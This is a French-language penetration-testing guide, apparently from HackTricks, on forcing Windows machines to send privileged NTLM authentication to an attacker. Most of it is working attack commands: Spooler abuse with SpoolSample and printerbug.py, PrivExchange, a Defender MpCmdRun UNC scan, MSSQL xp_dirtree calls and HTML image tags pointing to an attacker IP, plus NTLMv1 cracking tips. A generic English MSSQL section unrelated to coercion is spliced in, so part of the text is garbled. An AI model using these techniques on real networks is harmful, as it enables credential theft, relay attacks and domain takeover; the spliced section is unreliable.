7.9 KiB
Forcer l'authentification privilégiée NTLM
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFTs
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.
SharpSystemTriggers
SharpSystemTriggers est une collection de déclencheurs d'authentification à distance codés en C# en utilisant le compilateur MIDL pour éviter les dépendances tierces.
Abus du service Spooler
Si le service Print Spooler est activé, vous pouvez utiliser des informations d'identification AD déjà connues pour demander au serveur d'impression du contrôleur de domaine une mise à jour sur les nouveaux travaux d'impression et lui dire simplement de envoyer la notification à un système.
Notez que lorsque l'imprimante envoie la notification à des systèmes arbitraires, elle doit s'authentifier contre ce système. Par conséquent, un attaquant peut faire en sorte que le service Print Spooler s'authentifie contre un système arbitraire, et le service utilisera le compte de l'ordinateur dans cette authentification.
Trouver des serveurs Windows sur le domaine
En utilisant PowerShell, obtenez une liste de boîtes Windows. Les serveurs sont généralement prioritaires, donc concentrons-nous là-dessus :
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
Recherche des services Spooler en écoute
En utilisant une version légèrement modifiée de SpoolerScanner de @mysmartlogin (Vincent Le Toux) SpoolerScanner, vérifiez si le service Spooler est en écoute :
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
Vous pouvez également utiliser rpcdump.py sur Linux et rechercher le protocole MS-RPRN.
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
Demander au service de s'authentifier contre un hôte arbitraire
Vous pouvez compiler SpoolSample à partir d'ici.
SpoolSample.exe <TARGET> <RESPONDERIP>
ou utilisez dementor.py de 3xocyte ou printerbug.py si vous êtes sur Linux.
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
Combinaison avec la délégation sans contrainte
Si un attaquant a déjà compromis un ordinateur avec la délégation sans contrainte, l'attaquant pourrait faire authentifier l'imprimante contre cet ordinateur. En raison de la délégation sans contrainte, le TGT du compte d'ordinateur de l'imprimante sera enregistré dans la mémoire de l'ordinateur avec la délégation sans contrainte. Comme l'attaquant a déjà compromis cet hôte, il sera en mesure de récupérer ce ticket et de l'exploiter (Pass the Ticket).
Authentification forcée RCP
{% embed url="https://github.com/p0dalirius/Coercer" %}
PrivExchange
L'attaque PrivExchange
résulte d'une faille dans la fonctionnalité PushSubscription
du serveur Exchange, qui permet à n'importe quel utilisateur de domaine ayant une boîte aux lettres de forcer le serveur Exchange à s'authentifier sur n'importe quel hôte fourni par le client via HTTP.
Le service Exchange s'exécute en tant que SYSTEM et est sur-privilegié par défaut (c'est-à-dire qu'il dispose de privilèges WriteDacl sur le domaine avant la mise à jour cumulative 2019). Cette faille peut être exploitée pour relayer vers LDAP et déverser la base de données NTDS du domaine. Si nous ne pouvons pas relayer vers LDAP, cela peut être exploité pour relayer et s'authentifier sur d'autres hôtes dans le domaine. Cette attaque vous mènera directement à l'administrateur de domaine avec n'importe quel compte utilisateur de domaine authentifié.
Cette technique a été copiée d'ici.
À l'intérieur de Windows
Si vous êtes déjà à l'intérieur de la machine Windows, vous pouvez forcer Windows à se connecter à un serveur en utilisant des comptes privilégiés avec :
Defender MpCmdRun
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
MSSQL
Description
Microsoft SQL Server (MSSQL) is a relational database management system (RDBMS) developed by Microsoft. It is widely used in enterprise environments to store and manage data.
Attack Scenario
Attackers can abuse MSSQL to gain access to sensitive data stored in the database. This can be achieved through various techniques such as SQL injection, brute-force attacks, and exploiting vulnerabilities in the MSSQL server.
Mitigation
To mitigate the risk of MSSQL attacks, it is recommended to follow these best practices:
- Keep MSSQL server up-to-date with the latest security patches.
- Use strong and complex passwords for MSSQL accounts.
- Implement network segmentation to isolate MSSQL server from other systems.
- Use encryption to protect sensitive data stored in the MSSQL database.
- Monitor MSSQL server logs for any suspicious activity.
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
Ou utilisez cette autre technique: https://github.com/p0dalirius/MSSQL-Analysis-Coerce
Injection HTML
Via email
Si vous connaissez l'adresse e-mail de l'utilisateur qui se connecte à une machine que vous souhaitez compromettre, vous pouvez simplement lui envoyer un e-mail avec une image de 1x1 telle que
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
MitM
Si vous pouvez effectuer une attaque MitM sur un ordinateur et injecter du HTML dans une page qu'il visualisera, vous pouvez essayer d'injecter une image comme celle-ci dans la page :
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
Craquage de NTLMv1
Si vous pouvez capturer des défis NTLMv1, lisez ici comment les craquer.
Rappelez-vous que pour craquer NTLMv1, vous devez définir le défi Responder sur "1122334455667788"